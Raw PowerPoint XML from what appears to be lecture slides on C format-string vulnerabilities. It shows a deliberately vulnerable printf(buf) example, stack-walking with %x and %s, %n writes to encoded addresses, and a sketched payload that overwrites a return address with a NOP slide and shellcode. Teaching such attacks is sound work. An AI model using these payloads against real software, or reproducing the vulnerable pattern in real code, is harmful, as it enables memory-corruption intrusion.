              <a:ext cx="4876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What are the effects if </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                </a:rPr>
                <a:t>fmt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
                <a:t> is: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800" dirty="0" smtClean="0"/>
                <a:t>%s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800" dirty="0" smtClean="0"/>
                <a:t>%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
                <a:t>s%c</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:pPr marL="457200" indent="-457200">
                <a:buFont typeface="+mj-lt"/>
                <a:buAutoNum type="arabicPeriod"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
                <a:t>%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
                <a:t>x%x</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
                <a:t>...%x</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Right Brace 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="5015420" y="4634423"/>
              <a:ext cx="408559" cy="160019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3729" y="5562600"/>
              <a:ext cx="1131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11 times</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Arc 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="4105933"/>
            <a:ext cx="609600" cy="542267"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16083689"/>
              <a:gd name="adj2" fmla="val 5472821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810000" y="1524000"/>
            <a:ext cx="3687027" cy="16605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1.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> foo(char *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 {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2.    char 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[32];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3.    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy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=&gt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>);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5.  }</a:t>
            </a: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590800" y="4007306"/>
            <a:ext cx="914400" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -97129"/>
              <a:gd name="adj2" fmla="val 1105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fmt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588579" y="4648200"/>
            <a:ext cx="914400" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -100558"/>
              <a:gd name="adj2" fmla="val -2666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buf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Specific Address—1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7935" y="5159221"/>
            <a:ext cx="492443" cy="7463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err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Left Brace 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537865" y="4862994"/>
            <a:ext cx="286577" cy="133881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533400" y="1385406"/>
            <a:ext cx="286577" cy="34290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7935" y="2878787"/>
            <a:ext cx="492443" cy="44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foo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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495140"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="824442" y="1371600"/>
          <a:ext cx="146155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(32 bytes)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stale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foo’s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0000" y="3505200"/>
            <a:ext cx="47952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Observe: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>below</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> on the call stack, thus we can walk to it with the correct specifiers.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354491" y="5562600"/>
            <a:ext cx="3706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if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> is “%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>x%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>”?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Arc 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="4105933"/>
            <a:ext cx="609600" cy="542267"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16083689"/>
              <a:gd name="adj2" fmla="val 5472821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810000" y="1524000"/>
            <a:ext cx="3687027" cy="16605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1.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> foo(char *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 {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2.    char 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[32];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3.    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy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=&gt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>);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5.  }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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2462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Specific Address—2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7935" y="5159221"/>
            <a:ext cx="492443" cy="7463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err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Left Brace 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537865" y="4862994"/>
            <a:ext cx="286577" cy="133881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533400" y="1385406"/>
            <a:ext cx="286577" cy="34290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7935" y="2878787"/>
            <a:ext cx="492443" cy="44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foo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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387822"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="824442" y="1371600"/>
          <a:ext cx="146155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buf’s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other</a:t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28 bytes)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0xbffff747</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="b"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stale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foo’s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0" name="Arc 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="4105933"/>
            <a:ext cx="609600" cy="542267"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16083689"/>
              <a:gd name="adj2" fmla="val 5472821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3505200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Idea! Encode address to peek in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> first. Address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0xbffff747</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x47\xf7\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>little endian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800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1" y="563843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nsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>x47\xf7\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%x%s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:cs typeface="Consola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810000" y="1524000"/>
            <a:ext cx="3687027" cy="16605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1.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> foo(char *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 {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2.    char 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[32];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3.    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy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  <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf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  <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=&gt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>);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5.  }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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4566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Hijack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Overwrite return address with buffer-overflow induced by format string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Writing any value to any address directly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%n format specifier for writing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writing (some value) to a specific address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controlling the written value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does:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>a;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   printf(”-%10u-%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>n", 7350, &amp;a)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU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hu-HU" dirty="0" smtClean="0"/>
              <a:t>print?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19300" y="4876800"/>
            <a:ext cx="5105400" cy="9906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-      7350-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486400" y="3886200"/>
            <a:ext cx="3200400" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -95411"/>
              <a:gd name="adj2" fmla="val -14140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Print argument padded to 10 digits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276600" y="2895600"/>
            <a:ext cx="1981200" cy="3876898"/>
            <a:chOff x="3276600" y="2895600"/>
            <a:chExt cx="1981200" cy="387689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276600" y="3048000"/>
              <a:ext cx="609600" cy="22860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114800" y="5547518"/>
              <a:ext cx="0" cy="6397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838454" y="5547518"/>
              <a:ext cx="0" cy="6397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57600" y="6126167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 </a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>spaces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70405" y="6126167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4</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>digits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96291" y="2895600"/>
              <a:ext cx="761509" cy="24384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24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2857500"/>
            <a:ext cx="3352800" cy="1143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 spc="-50" normalizeH="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Cambria"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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mbria"/>
              </a:rPr>
              <a:t>Fact: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mbria"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:b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mbria"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Ubuntu Linux has over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>99,000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>known bugs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty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3" name="Picture 2" descr="iStock_000018008714XSmal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17822"/>
            <a:ext cx="2514600" cy="2014279"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="iStock_000013159460XSmall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2823" y="2895601"/>
            <a:ext cx="1927412" cy="30769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5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68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Overflow by Format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085" y="1589012"/>
            <a:ext cx="4434115" cy="9255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char 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[32];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sprintf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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, user);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944584" y="3797301"/>
            <a:ext cx="6199415" cy="681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“%36u\x3c\xd3\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\bf&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nops</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;”</a:t>
            </a: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904670" y="4698746"/>
            <a:ext cx="2810330" cy="1070267"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -26752"/>
              <a:gd name="adj2" fmla="val -10020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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>6 digit decimal, overwriting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>buf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caller’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ebp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4252685" y="2957286"/>
            <a:ext cx="2231571" cy="632556"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -22033"/>
              <a:gd name="adj2" fmla="val 9321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Overwrite</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>return address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6382657" y="4730774"/>
            <a:ext cx="1846943" cy="632556"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -35393"/>
              <a:gd name="adj2" fmla="val -13224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Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> with</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> slide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7935" y="5056629"/>
            <a:ext cx="492443" cy="84895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err="1" smtClean="0"/>
              <a:t>sprintf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Left Brace 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537865" y="4862994"/>
            <a:ext cx="286577" cy="133881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533400" y="1385406"/>
            <a:ext cx="286577" cy="34290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7935" y="2878787"/>
            <a:ext cx="492443" cy="44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/>
              <a:t>foo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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43708"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="824442" y="1371600"/>
          <a:ext cx="146155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(32 bytes)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foo’s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locals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7" name="Arc 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="4105933"/>
            <a:ext cx="609600" cy="542267"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16083689"/>
              <a:gd name="adj2" fmla="val 5472821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3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%n Format Specifier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%n writes the number of bytes printed so far to an integer specified by its address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 smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>abcde%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\n”, 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*) &amp;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	</a:t>
            </a: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 smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(“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 = %d\n”,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buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas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Output: 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abcde</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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 = 5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Writing to Specific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4754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Encode address in format string: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Writes a small </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>num</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> at destination </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0xbfffc8c0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Can use four carefully-controlled writes to create an address at destination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36341" y="2133600"/>
            <a:ext cx="4980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/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\xc0\xc8\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\xbf</a:t>
            </a:r>
